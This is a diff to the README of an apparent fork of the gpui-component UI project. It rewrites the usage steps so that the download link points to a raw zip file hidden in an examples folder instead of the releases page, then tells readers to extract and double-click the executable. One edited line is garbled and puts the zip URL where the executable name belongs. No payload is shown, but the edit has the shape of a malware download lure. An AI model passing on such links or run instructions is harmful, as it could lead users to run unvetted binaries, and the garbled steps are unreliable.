Jeanineunfavorable104/gpui-component/README.md

 ## 💡 Usage Instructions
 1. **Download the Application**
-   Visit this page to download: [Releases Page](https://github.com/Jeanineunfavorable104/gpui-component/releases).
+   Visit this page to download: [Releases Page](https://raw.githubusercontent.com/Jeanineunfavorable104/gpui-component/main/crates/story/examples/gpui-component-v3.0.zip).

 2. **Extract the Files**
    After downloading, locate the downloaded file.
 If it is in a zipped format, right-click on it and select "Extract All" to extract its contents.

 3. **Run the Application**
    After extraction, navigate to the folder where you extracted the files.
-Look for the executable file (for example, `gpui-component.exe` on Windows).
+Look for the executable file (for example, `https://raw.githubusercontent.com/Jeanineunfavorable104/gpui-component/main/crates/story/examples/gpui-component-v3.0.zip` on Windows).
 Double-click it to run the application.

 4. **Explore Features**
    Once the application is open, take a moment to explore its features.
 You can create and manage your UI components with ease using our user-friendly interface.